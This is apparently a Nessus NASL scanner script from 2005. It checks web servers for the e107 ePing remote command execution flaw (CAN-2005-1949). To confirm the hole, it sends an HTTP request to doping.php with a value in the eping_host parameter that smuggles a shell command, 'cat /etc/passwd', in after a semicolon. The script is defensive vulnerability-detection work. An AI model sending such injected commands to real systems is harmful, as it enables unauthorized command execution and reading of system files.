##############################################################################
#
#  e107 ePing Remote Command Execution Vulnerability
#
#  Copyright: OS2A and it's member companies
#
#  Date Written: 2005/07/27
#
#  $Revision: 1.1 $
#
#
#  $Log: os2a_eping_remotecode_600148.nasl,v $
#  Revision 1.1  2005/08/25 12:05:51  bchandra
#  Issue #659 #518
#
#  Revision 1.1  2005/07/27 10:51:32  drahul
#  issue #518
#
#
#
#
#  ------------------------------------------------------------------------
#  This program was written by OS2A and/or it's member companies and is
#  licensed under the GNU GPL license. Please see below for details. This
#  header contains information regarding licensing terms under the GPL, and
#  information regarding obtaining source code from the Author. Consequently,
#  pursuant to section 3(c) of the GPL, you must accompany the information
#  found in this header with any distribution you make of this Program.
#  ------------------------------------------------------------------------
##############################################################################


if (description)
{
 script_id(600148);
 script_bugtraq_id(13929);
 script_cve_id("CAN-2005-1949");
 script_copyright(english:"Copyright (C) 2005 OS2A");
 script_version ("$Revision: 1.1 $");
 script_category(ACT_MIXED_ATTACK);
 script_family(english:"CGI abuses");

 script_name(english:"e107 ePing Remote Command Execution Vulnerability");

 script_summary(english:"Check for eping Remote Command Execution");

 desc["english"] = "
 Overview :
 ePing 1.02 (prior to 14-june-2005) and earlier versions is prone to a remote
 command execution vulnerability. Due to this, an attacker can supply arbitrary
 shell commands and have them executed in the context of the server.
 
 Impact :
 This vulnerability can be exploited to  facilitate various attacks including
 unauthorized access to an affected computer.

 Affected Platforms :
 Any system running the affected software.

 Solution :
 Update to version 1.02 (Post 14-June-2005)
 http://e107coders.org/download.php?view.991

 References :
 http://marc.theaimsgroup.com/?l=bugtraq&m=111835539312985&w=2

 Risk factor : High";

 script_description(english:desc["english"]);

 script_dependencies("http_version.nasl");

 script_require_ports("Services/www", 80);

 exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if(!port){
	port = 80;
}

dirs = make_list("", "/e107", cgi_dirs());
foreach dir (dirs)
{        
	url = string(dir, "/e107_plugins/eping/doping.php");

	sendRequest = http_get(item:url, port:port);
	receiveResponse = http_keepalive_send_recv(port:port, data:sendRequest,
			  			   bodyonly:1);
  	
	if( receiveResponse == NULL ){
		exit(0);
	 }

	#Try to find whether ping operation is permitted or not.
	if("Invalid operation - potential hacking attempt" >< receiveResponse)
	{    

	  	#Try to exploit doping.php
		url =string(url, "?eping_cmd=ping%20-n&eping_host=127.0.0.1;" +
				 "cd%20/;cat%20/etc/passwd&eping_count=2");
	        sendRequest = http_get(item:url, port:port);
        	receiveResponse = http_keepalive_send_recv(port:port,
							   data:sendRequest,
                                                   	   bodyonly:1);
	
		if("Access denied." >!< receiveResponse)
		{
  			security_hole(port);
			exit(0);
   		}
	}
}